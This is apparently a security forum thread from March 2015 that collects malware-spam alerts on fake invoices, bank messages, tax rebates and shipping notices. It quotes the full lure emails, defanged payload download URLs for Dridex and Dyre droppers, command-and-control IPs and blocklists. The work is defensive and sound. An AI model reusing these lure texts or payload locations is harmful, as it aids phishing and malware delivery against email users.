There is no body text, but there is an attachment Document1.doc which is not currently detected by AV vendors*, in turn it contains this malicious macro... which downloads another component from the following location:
http ://retro-moto .cba .pl/js/bin.exe
Note that there may be other different versions of this document with different download locations, but it should be an identical binary that is downloaded. This file is saved as %TEMP%\GHjkdjfgjkGKJ.exe and has a VirusTotal detection rate of 2/57**. Automated analysis tools... show attempted network traffic to the following IPs:
92.63.87.13 (MWTV, Latvia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithunia)
108.61.198.33 (Gameservers.com / Choopa LLC, Netherlands)
According to the Malwr report it also drops another version of itself with a detection rate of just 1/57*** plus a DLL with a detection rate of 7/56****.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
104.232.32.119
87.236.215.103
108.61.198.33 "
* https://www.virustotal.com/en/file/20afc565c00d30b2d194366d088b73b20913af78857c906305fab79a5c726f83/analysis/1425464228/
** https://www.virustotal.com/en/file/193401848fc8e9e05dff43ff6796156f54ef32987f5beb20682f40f469be741e/analysis/1425464153/
*** https://www.virustotal.com/en/file/71d01f4fdf48bc674ea9dc84ac076a22094ab529f4776fb9c0c5a13cfb00a438/analysis/1425466045/
**** https://www.virustotal.com/en/file/02cda7a3217390dfe6f40c7336efd368131f6fb9620129744422459da1dea17a/analysis/1425466059/
- http://myonlinesecurity.co.uk/john-donald-kingfishermanagement-uk-com-document1-word-doc-or-excel-xls-spreadsheet-malware/
4 Mar 2015
> Document1.docx: https://www.virustotal.com/en/file/b8dc4c8dcc9d7be5e82079b2f28a63363afc9c3ebadd4034b98b4862e39db580/analysis/1425459634/
> https://www.virustotal.com/en/file/193401848fc8e9e05dff43ff6796156f54ef32987f5beb20682f40f469be741e/analysis/1425460757/
... Behavioural information
TCP connections
92.63.87.13: https://www.virustotal.com/en/ip-address/92.63.87.13/information/
___
Fake 'Remittance advice' SPAM – word doc or excel xls malware
- http://myonlinesecurity.co.uk/remittance-advice-rem_5556yj-xml-word-doc-or-excel-xls-spreadsheet-malware/
4 Mar 2015 - "'Remittance advice [Rem_5556YJ.xml] (random numbers)' pretending to come from random addresses and random companies with a malicious word doc or Excel XLS spreadsheet attachment, these are actually XLM word files is another one from the current bot runs... This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus. Modern versions of Microsoft office, that is Office 2010 and 2013 and Office 365 have Macros disabled by default, UNLESS you or your company have enabled them... The email looks like:
Good morning
You can find remittance advice [Rem_5556YJ.xml] in the attachment
Kind Regards
Lenny Madden
GLAXOSMITHKLINE
4 March 2015 : Rem_5892GV.xml Current Virus total detections: 0/56* | 0/56**
So far I have only seen 2 versions of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 or even more different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d40d05316db62ea3d27830f87892aaeab3ff22b63babadb755aad10dcba85a7d/analysis/1425470968/
** https://www.virustotal.com/en/file/583c668dce73021aae44daab0788fc8ae5fecefab0989ab45ee60bba00465943/analysis/1425471785/
- http://blog.dynamoo.com/2015/03/remittance-advice-spam-has-mystery-xml.html
4 Mar 2015
"... recommend blocking them:
62.76.176.203
46.30.42.171
74.208.68.243
37.139.47.111 "
___
Fake 'UPS Tracking' SPAM – PDF malware
- http://myonlinesecurity.co.uk/ups-ship-notification-tracking-number-1z06e18a6840121864-fake-pdf-malware/
4 Mar 2015 - "'UPS Ship Notification, Tracking Number 1Z06E18A6840121864 pretending to come from UPS <no-replay@ upsi .com> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/UPS-Ship-Notification-Tracking-Number-1Z06E18A6840121864.png
04 March 2015: Details.zip: Extracts to: Details.exe
Current Virus total detections: 12/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3d68d1d5e8d2207dbf340d383938cbc4d61f69b2dd526889a5f7041c6c5b38a4/analysis/1425482799/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
190.111.9.129: https://www.virustotal.com/en/ip-address/190.111.9.129/information/
108.174.149.222: https://www.virustotal.com/en/ip-address/108.174.149.222/information/
190.111.9.129: https://www.virustotal.com/en/ip-address/190.111.9.129/information/
UDP communications
212.79.111.155: https://www.virustotal.com/en/ip-address/212.79.111.155/information/
212.79.111.156: https://www.virustotal.com/en/ip-address/212.79.111.156/information/
___
Fake 'invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/ron-miller-rmpd7989-invoices-fake-pdf-malware/
4 Mar 2015 - "'RMPD#7989 – invoices' pretending to come from Rothn-Ron <ron@ bellsouth .net> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/RMPD7989-invoices.png
04 March 2015: RMPD#7989 INVOICES.zip: Extracts to: RMPD#7989 INVOICES.exe
Current Virus total detections: 9/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e73daa08ae82b4e5a9b7974a4dbfc3e46525258346d73963fed319cd79656ee5/analysis/1425486885/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
190.111.9.129: https://www.virustotal.com/en/ip-address/190.111.9.129/information/
108.174.149.222: https://www.virustotal.com/en/ip-address/108.174.149.222/information/
190.111.9.129: https://www.virustotal.com/en/ip-address/190.111.9.129/information/
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
217.116.122.136: https://www.virustotal.com/en/ip-address/217.116.122.136/information/
___
Many common sites might be temporarily offline
- http://myonlinesecurity.co.uk/many-common-sites-might-be-temporarily-offline/
4 Mar 2015 - "... Amazon and Rackspace have both announced that they will need to -reboot- some of their servers to address the issue before March 10, when the Xen Project plans to disclose the latest bugs*. Details of the vulns are being withheld for now, to give the cloud vendors time to patch. In a FAQ** about the upcoming maintenance, Amazon Web Services said that only some of its earliest Elastic Compute Cloud (EC2) customers should be affected."
* http://xenbits.xen.org/xsa/
** https://aws.amazon.com/premiumsupport/maintenance-2015-03/
- http://blog.trendmicro.com/trendlabs-security-intelligence/freak-vulnerability-forces-weaker-encryption/
Mar 4, 2015 - "... We advise Android users to refrain from using the default Android browser in their devices. They can instead use the Google Chrome app as it is not affected by the bug. Furthermore, connections to the Google search site are not affected. According to Deep Security Labs Director Pawan Kinger, FREAK is a serious and very real vulnerability which may require some level of sophistication to exploit. However, its sophistication won’t dissuade determined attackers. Carrying out a FREAK exploit requires attackers to be able to first create a man-in-the-middle (MITM) attack against the servers. It would also require the ability to control an SSL session between client and server and then force that session to downgrade to the lower encryption level. Then, the attacker would have to take the weakly encrypted traffic and perform a brute force attack against it that would take several hours, as opposed to days or weeks with higher encryption... Administrators can also check if their site is vulnerable by using the SSL Labs’ SSL Server Test*..."
* https://www.ssllabs.com/ssltest/
- http://www.bloomberg.com/news/videos/2015-03-04/hackers-exploit-freak-attack-hole
Mar 4, 2015 - Video 2:40
:fear::fear: :mad:
AplusWebMaster
2015-03-05, 14:36
FYI...
Fake 'Brochure' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/bobby-drell-abbottpainting-com-brochure2-doc-word-doc-or-excel-xls-spreadsheet-malware/
5 Mar 2015 - "'Brochure2.doc' pretending to come from Bobby Drell <rob@ abbottpainting .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please change the year to 2015.
Please confirm receipt
Thanks
Bobby Drell
5 March 2015 : Brochure2.doc - Current Virus total detections: 1/57* ... the malicious macro connects to & downloads data.gmsllp.com/js/bin.exe (dridex banking Trojan) which is saved as %Temp%\324235235.exe that has a virus total rate of 2/57** ... So far I am only seeing 1 version of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b400baf11a2a402f8ac05d1ecb99e81bbedebea859aae6918b16eaba8feff296/analysis/1425549729/
** https://www.virustotal.com/en/file/33abbf4f14f1b419618c1efb2dcbb346de815b7727b9caee02bc84ce4b675f5b/analysis/1425550694/
- http://blog.dynamoo.com/2015/03/malware-spam-bobby-drell.html
5 Mar 2015
"... Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24 "
___
Fake Natwest SPAM - PDF malware
- http://myonlinesecurity.co.uk/natwest-bankline-re-incident-im00491288-fake-pdf-malware/
5 Mar 2015 - "'RE: Incident IM00491288' pretending to come from Kevin Otero <Kevin.Otero@ bankline .natwest .com> with a zip attachment is another one from the current bot runs... different random names. So far names and email addresses seen are
Kevin Otero <Kevin.Otero@ bankline .natwest .com>
Collin Stovall <Collin.Stovall@ bankline .natwest .com>
Lavern Olsen <Lavern.Olsen@ bankline .natwest .com>
Rae Bouchard <Rae.Bouchard@ bankline .natwest .com>
Nadine Kerr <Nadine.Kerr@bankline .natwest .com>
... The email looks like:
Good Afternoon ,
Attached are more details regarding your account incident.
Please extract the attached content and check the details.
Please be advised we have raised this as a high priority incident and will endeavour to resolve it as soon as possible. The incident reference for this is IM00491288.
We would let you know once this issue has been resolved, but with any further questions or issues, please let me know.
Kind Regards,
Kevin Otero
Level 2 Adviser | Customer Experience Team, IB Service & Operations 7th Floor, 1 ...
5 March 2015: Incident IM00491288.zip: Extracts to: IM0743436407_pdf.exe
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/60243596f8d978350fdacc417e9945d4da6bd713733fa31fc44611c7f8a8eba8/analysis/1425548558/
___
Fake Invoice SPAM - PDF malware
- http://myonlinesecurity.co.uk/carmel-wilson-alpro-invoices-7985974765-fake-pdf-malware/
5 Mar 2015 - "'Alpro Invoice(s): 7985974765' pretending to come from Alpro <carmel@ alpro .com> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Alpro.png
5 March 2015 : invoice7985974765.zip: Extracts to: invoice7985974765.exe
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6c69e4579d565906827983246c93ed0d43f408326a1e3fac351a4730226424f2/analysis/1425547819/
:fear: :mad:
AplusWebMaster
2015-03-06, 13:17
FYI...
Fake IRS SPAM - doc malware
- http://blog.dynamoo.com/2015/03/malware-spam-your-2015-electronic-ip.html
6 Mar 2015 - "This -fake- IRS email comes with a malicious attachment.
From: Internal Revenue Service [refund.noreply@ irs .gov]
Date: 6 March 2015 at 08:48
Subject: Your 2015 Electronic IP Pin!
Dear Member
This is to inform you that our system has generated your new secured Electronic PIN to e-file your 2014 tax return.
Please kindly download the microsoft file to securely review it.
Thanks
Internal Revenue Service ...
... attachment TaxReport(IP_PIN).doc ... there are usually several different versions[1]. Currently this is -undetected- by AV vendors*. This contains a malicious macro... which downloads a component from the following location:
http ://chihoiphunumos .ru/js/bin.exe
There are probably other download locations, but the payload will be the same. This is saved as %TEMP%\324235235.exe and has a detection rate of 1/55**. Automated analysis tools... show attempted connections to:
92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithunia)
According to the Malwr report this executable drops another version of itself [VT 1/56***] and a malicious DLL [VT 2/56****].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24
104.232.32.119
87.236.215.103 "
* https://www.virustotal.com/en/file/d3a6e6b43461f3cf80b8e664d61213e67755fd20569332ec35e4502822a7231b/analysis/1425632162/
** https://www.virustotal.com/en/file/8073a8324b1c42da3e7eec6d0c77cf980497fd260a68358a350fd1f1d058cdbb/analysis/1425632174/
*** https://www.virustotal.com/en/file/a96f7f894b88f8521ec196a2da4527ba026b8134a99a55e02fd7c4d023a2554c/analysis/1425632946/
**** https://www.virustotal.com/en/file/84ccc4b9d6b67c56dc48a022d207f5490f49ea81661d5d655fce705c0274f3aa/analysis/1425632950/
1] http://myonlinesecurity.co.uk/internal-revenue-service-your-2015-electronic-ip-pin-word-doc-or-excel-xls-spreadsheet-malware/
6 Mar 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Your-2015-Electronic-IP-Pin.png
___
Fake 'Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/mick-george-invoice-395687-for-dudley-construction-ltd-word-doc-or-excel-xls-spreadsheet-malware/
6 Mar 2015 - "'Mick George Invoice 395687 for Dudley Construction Ltd' pretending to come from Mick George Invoicing <mginv@ mickgeorge .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... These emails today, so far, are all malformed and broken. Every copy that I have received appears garbled and doesn’t actually have an attachment. Some mail servers will be configured to repair the damage and deliver the email in its full glory, where it will potentially infect you. This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Mick-George-invoice.png
... the malware payload will be identical to today’s other malicious office document run Internal Revenue Service Your 2015 Electronic IP Pin! – word doc or excel xls spreadsheet malware*. We do notice that the bad guys are using 2 or 3 subjects and email templates but using the same malware that has been -renamed- ...
Edit: I have managed to extract the malware payload from a quarantined copy on the server and can confirm that it is the -same- malware payload as today’s other run although renamed as Invoice395687.DOC . So far I am only seeing 1 version of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 different versions, some with word doc attachments and some with Excel xls attachments..."
* http://myonlinesecurity.co.uk/internal-revenue-service-your-2015-electronic-ip-pin-word-doc-or-excel-xls-spreadsheet-malware/
- http://blog.dynamoo.com/2015/03/malware-spam-mick-george-invoice-395687.html
6 Mar 2015 - "This -malformed- spam is meant to have a malicious attachment... This malware and the payload it drops is identical to the one found in this -fake- IRS spam run* earlier today..."
* http://blog.dynamoo.com/2015/03/malware-spam-your-2015-electronic-ip.html
___
Fake Bankline SPAM - malware
- http://blog.dynamoo.com/2015/03/malware-spam-you-have-received-new.html
6 Mar 2015 - "This fake banking spam leads to malware.
From: Bankline [secure.message@ business .natwest .com]
Date: 6 March 2015 at 10:36
Subject: You have received a new secure message from BankLine
You have received a secure message.
Your Documents have been uploaded to Cubby cloud storage.
Cubby cloud storage is a cloud data service powered by LogMeIn, Inc.
Read your secure message by following the link bellow: ...
<redacted> ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 8719.
First time users - will need to register after opening the attachment...
This downloads a ZIP file from cubbyusercontent .com which contains a malicious executable Business Secure Message.exe which has a VirusTotal detection rate of just 1/57*. Automated analysis tools... show attempted connections to the following URLs:
http ://all-about-weightloss .org/wp-includes/images/vikun.png
http ://bestcoveragefoundation .com/wp-includes/images/vikun.png
http ://190.111.9.129 :14248/0603no11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
http ://190.111.9.129 :14249/0603no11/HOME/41/7/4/
It also appears that there is an attempted connection to 212.56.214.203.
Of all of these IPs, 190.111.9.129 (Navega.com, Guatemala) is the most critical to -block-.
It is also a characteristic of this malware (Upatre/Dyre) that it connects to checkip.dyndns .org to work out the IP address of the infected machine, it is worth checking for traffic to this domain. The Malwr report shows several dropped files, including fyuTTs27.exe which has a VirusTotal detection rate of 4/57**."
* https://www.virustotal.com/en/file/d32b3101ed671c91c71a85946fbbfc8027108b0e82713a427c6f99560e2a4c89/analysis/1425640773/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
190.111.9.129: https://www.virustotal.com/en/ip-address/190.111.9.129/information/
192.254.186.169: https://www.virustotal.com/en/ip-address/192.254.186.169/information/
46.151.254.183: https://www.virustotal.com/en/ip-address/46.151.254.183/information/
5.178.43.49: https://www.virustotal.com/en/ip-address/5.178.43.49/information/
212.56.214.203: https://www.virustotal.com/en/ip-address/212.56.214.203/information/
UDP communications
74.125.200.127: https://www.virustotal.com/en/ip-address/74.125.200.127/information/
** https://www.virustotal.com/en/file/8344db76faf830e10acf0babb512bc1fca9774f53fe084e13633a23a62879b1d/analysis/1425641282/
... Behavioural information
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
217.116.122.136: https://www.virustotal.com/en/ip-address/217.116.122.136/information/
___
Fake HSBC SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-fake-pdf-malware/
6 Mar 2015 - "'HSBC Payment' pretending to come from HSBC <no-replay@ hsbc .co.uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/HSBC-Payment.png
6 March 2015: HSBC-2739.zip: Extracts to: HSBC-2739.exe
Current Virus total detections: 0/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4702fdc4487d8d8e657e74d87a3fbc20ca1b433aba29b52891fd83319dc8a209/analysis/1425636158/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
5.10.69.232: https://www.virustotal.com/en/ip-address/5.10.69.232/information/
190.111.9.129: https://www.virustotal.com/en/ip-address/190.111.9.129/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
77.72.169.167: https://www.virustotal.com/en/ip-address/77.72.169.167/information/
77.72.169.166: https://www.virustotal.com/en/ip-address/77.72.169.166/information/
___
Fake Gateway SPAM - PDF malware
- http://myonlinesecurity.co.uk/your-online-gateway-gov-uk-submission-fake-pdf-malware/
6 Mar 2015 - "'Your online Gateway .gov .uk Submission' pretending to come from Gateway .gov.uk <ruyp@ bmtrgroup .com> with a link to download a zip attachment is another one from the current bot runs... The email looks like:
Your online Gateway .gov.uk Submission
Government Gateway logo
Electronic Submission Gateway
Thank you for your submission for the Government Gateway.
The Government Gateway is the UK’s centralized registration service for e-Government services.
To view/download your form to the Government Gateway please visit http ://www.gateway .gov.uk/
This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
gov .uk - the best place to find government services and information - Opens in new window
The best place to find government services and information
The link in the email leads to... the same malware as today’s run of 'You have received a new secure message from BankLine' -fake- PDF malware*.
* http://myonlinesecurity.co.uk/received-new-secure-message-bankline-fake-pdf-malware/
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___
Cryptowall, again!
- https://isc.sans.edu/diary.html?storyid=19427
Last Updated: 2015-03-06 - "A new variant of Cryptowall (An advanced version of cryptolocker) is now using a malicious .chm file attachment to infect systems. According to net-security.org*, Bitdefender labs has found a -spam- wave that spread a malicious .chm attachments. CHM is the compiled version of html that support technologies such as JavaScript which can -redirect- a user to an external link. “Once the content of the .chm archive is accessed, the malicious code downloads from this location http :// *********/putty.exe, saves itself as %temp%\natmasla2.exe and executes the malware. A command prompt window opens during the process”..."
* http://net-security.org/malware_news.php?id=2981
Mar 5, 2015
> http://www.net-security.org/images/articles/cryptowall-calc.jpg
:fear::fear: :mad:
AplusWebMaster
2015-03-09, 15:34
FYI...
Fake 'Statement' SPAM - doc malware
- http://myonlinesecurity.co.uk/statement-from-marketing-technology-group-inc-fake-pdf-malware/
9 Mar 2015 - "'Statement from MARKETING & TECHNOLOGY GROUP, INC. pretending to come from TECHNOLOGY GROUP <rwilborn@ mtgmediagroup .com> with a zip attachment is another one from the current bot runs... The email looks like:
Dear Customer :
Your statement is attached. Please remit payment at your
earliest convenience.
Thank you for your business – we appreciate it very
much.
Sincerely,
MARKETING & TECHNOLOGY GROUP, INC
9 March 2015: docs2015.zip: Extracts to: docs2015.exe
Current Virus total detections: 2/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1b893ca3b782679b1e5d1afecb75be7bcc145b5da21a30f6c18dbddc9c6de4e7/analysis/1425899308/
___
Fake 'Credit Application' SPAM – PDF malware
- http://myonlinesecurity.co.uk/emailing-serv-ware-credit-application-pdf-fake-pdf-malware/
9 Mar 2015 - "'Emailing: Serv-Ware Credit Application.pdf' with a zip attachment pretending to come from clint@ servware .com is another one from the current bot runs... The email looks like:
—
Thanks,
Clint Winstead
Manager
Serv-Ware Products
clint@ servware .com
phone: 800.768.5953
fax : 800.976.1299 ...
9 March 2015: Serv-WareCreditApplication.zip: Extracts to: Serv-WareCreditApplication.exe
Current Virus total detections: 8/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d48507819dd4a42b1f751cc0f60884513389f1be25b34f642e0276cdabbbece9/analysis/1425915088/
... Behavioural information
TCP connections
75.127.114.162: https://www.virustotal.com/en/ip-address/75.127.114.162/information/
UDP communications
77.72.174.163: https://www.virustotal.com/en/ip-address/77.72.174.163/information/
77.72.174.162: https://www.virustotal.com/en/ip-address/77.72.174.162/information/
___
Paypal PHISH
- http://myonlinesecurity.co.uk/your-paypal-account-is-limited-take-action-now%E2%80%8F-phishing/
8 Mar 2015 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like:
There have been unauthorised or suspicious attempts to log in to your account, please verify
Your account has exceeded its limit and needs to be verified
Your account will be suspended !
You have received a secure message from < your bank>
We are unable to verify your account information
Update Personal Information
Urgent Account Review Notification
We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
Confirmation of Order
your PayPal account is limited – take action now
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/your-PayPal-account-is-limited-take-action-now.png
This one wants your personal details, your Paypal account log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details..."
:fear: :mad:
AplusWebMaster
2015-03-10, 17:04
FYI...
Fake 'PMQ agreement' SPAM - PDF malware
- http://myonlinesecurity.co.uk/2015-pmq-agreement-linda-pmq-fake-pdf-malware/
10 Mar 2015 - "'2015 PMQ agreement' pretending to come from linda@ pmq .com with a zip attachment is another one from the current bot runs... The email looks like:
HI
I have Not received your signed contract for the 2015 ad campaign. If you would please sign and return.
Thank you
Linda
—
Watch our 2015 PMQ Media Kit here ...
PMQ Pizza Magazine
Linda Green / Co-Publisher
(662)234-5481 ext 121 / linda.pmq@ gmail .com
cell (662)801-5495
PMQ Pizza Magazine Office: 662-234-5481 x121 / Fax: 662-234-0665
605 Edison Street, Oxford, MS 38655 ...
Don’t forget to renew your subscription to the magazine at ...
10 March 2015 : American_Wholesale.zip: Extracts to: American_Wholesale.exe
Current Virus total detections: 9/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ae71d65a32303f1f129292420532be2c907d04a05c1aef9a429ecf487b578681/analysis/1425997192/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
95.181.53.78: https://www.virustotal.com/en/ip-address/95.181.53.78/information/
122.155.1.42: https://www.virustotal.com/en/ip-address/122.155.1.42/information/
77.85.204.114: https://www.virustotal.com/en/ip-address/77.85.204.114/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
208.91.197.54: https://www.virustotal.com/en/ip-address/208.91.197.54/information/
173.194.71.127: https://www.virustotal.com/en/ip-address/173.194.71.127/information/
___
Apple Watch Giveaway Spam Clocks In on Twitter
- https://blog.malwarebytes.org/privacy-2/2015/03/apple-watch-giveaway-spam-clocks-in-on-twitter/
Mar 10, 2015 - "Twitter users should be aware that mentioning the new Apple Watch could result in -spam- headed their way:
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/watchspm0.jpg
... The so-called Apple Giveaways profile says the following in its Bio space:
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/watchspm6.jpg
It may sound promising, but what follows is a semi-exhausting jaunt around a couple of different websites with instructions to follow along the way... What we do end up with is a wall of text on a Facebook page with some very specific hoops to jump through in order to obtain the watch... they claim they’ll direct message within 72 hours with a “confirmation link”. The creation date for the website is listed as March 9th, and the Whois details are hidden behind a Whoisguard so there’s no way to know who you’re sending your information to... this seems like a long shot in terms of “winning” the incredibly expensive watch..."
:fear::fear: :mad:
AplusWebMaster
2015-03-11, 14:43
FYI...
Fake 'Tax rebate' SPAM – doc or xls malware
- http://myonlinesecurity.co.uk/your-tax-rebate-word-doc-or-excel-xls-spreadsheet-malware/
11 Mar 2015 - "'Your Tax rebate' pretending to come from HMRC Revenue&Customs with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
HM revenue
Dear ...
After the last yearly computations of your financial functioning we have defined that you
have the right to obtain a tax rebate of 934.80.
Please confirm the tax rebate claim and permit us have
6-9 days so that we execute it.
A rebate can be postponed for a variety of reasons.
For instance confirming unfounded data or applying
not in time.
To access the form for your tax rebate, view the report attached. Document Reference: (983EMI).
Regards,
HM Revenue Service. We apologize for the inconvenience...
The malware payload with this template is same as today’s "Your Remittance Advice [FPAEEKBYQU] – Word doc malware"* . So far I am only seeing 1 version of this malware..."
* http://myonlinesecurity.co.uk/your-remittance-advice-fpaeekbyqu-word-doc-malware/
- http://blog.dynamoo.com/2015/03/malware-spam-bacs-remittance-advice.html
11 Mar 2015
"... Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177 "
___
Fake 'Remittance' SPAM - doc or xml malware
- http://myonlinesecurity.co.uk/your-remittance-advice-fpaeekbyqu-word-doc-malware/
11 Mar 2015 - "'Your Remittance Advice [FPAEEKBYQU] (random characters)' coming from random names and email addresses with a malicious word doc or xml attachment is another one from the current bot runs... The email looks like:
Good Morning,
Please find attached the BACS Remittance Advice for payment made by FORUM ENERGY.
Please note this may show on your account as a payment reference of FPANJRCXFM.
Kind Regards
Marilyn Aguilar
Accounts Payable
11 March 2015 : Rem_7656CN.xml - Current Virus total detections: 2/57*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c7af5902e5922a9a89c4464a36b5c4f6d98e8d613a412581d7f64c2fab4ce2fb/analysis/1426068203/
___
Fake blank body SPAM - doc or xls malware
- http://myonlinesecurity.co.uk/inv-09-03-jora-service-word-doc-or-excel-xls-spreadsheet-malware/
11 Mar 2015 - "'inv.09.03' pretending to come from Jora Service <jora.service@ yahoo .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email has a totally empty-body with just the attachment.
11 March 2015 : INV 86-09.03.2015.doc - Current Virus total detections: 0/56*
So far I am only seeing 1 version of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 different versions, some with word doc attachments and some with Excel xls attachments..."
* https://www.virustotal.com/en/file/52e7cf353466ed7a34da9fd5be5b14ac25a364493ac41ab7626b421904277943/analysis/1426067908/
___
Fake 'admin.scanner' SPAM - doc or xls malware
- http://myonlinesecurity.co.uk/message-from-rnp0026735991e2-word-doc-or-excel-xls-spreadsheet-malware/
11 Mar 2015 - "'Message from RNP0026735991E2' pretending to come from admin.scanner@ <your own email domain> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
This E-mail was sent from “RNP0026735991E2″ (MP C305).
Scan Date: 11.03.2015 08:57:25 (+0100)
Queries to: admin.scanner@ ...
11 March 2015 : 201503071457.xls - Current Virus total detections: 0/56*
This looks like it is the same malware payload as today’s 'inv.09.03 Jora Service' – word doc or excel xls spreadsheet malware**..."
* https://www.virustotal.com/en/file/189f436ca27dc657552eafc9b39f21b7dee873f4669c1ce9d7c11eb39fbec89d/analysis/1426068752/
** http://myonlinesecurity.co.uk/inv-09-03-jora-service-word-doc-or-excel-xls-spreadsheet-malware/
- http://blog.dynamoo.com/2015/03/malware-spam-message-from.html
11 Mar 2015
"... Recommended blocklist:
188.225.77.216
42.117.1.88
31.41.45.211
87.236.215.103
104.232.32.119
188.120.243.159 "
___
Fake 'Rate Increase' SPAM - PDF malware
- http://myonlinesecurity.co.uk/please-phoenix-zhang-shin-p-j-international-ltd-fake-pdf-malware/
11 Mar 2015 - "'Please' pretending to come from Phoenix <phoenix@ pnjinternational .com> with a zip attachment is another one from the current bot runs... The email looks like:
Good Afternoon,
Please find attached notice regarding carriers pre-filing for an additional General Rate Increase for effective date of April 9, 2015. Please note, we are advising you of this filing in order to comply with FMC regulations. However, we feel it is unlikely that the carriers will be successful in implementing this increase, especially since the March 9th GRI has already been postponed to March 17th. We will continue to keep you updated as we receive additional information pertaining to these filed rate increases.
Phoenix Zhang-Shin
Director
P & J International Ltd
Calverley House, 55 Calverley Road
Tunbridge Wells, Kent, UK TN1 2TU ...
11 March 2015: documents-id323.zip: Extracts to: documents-id323.exe
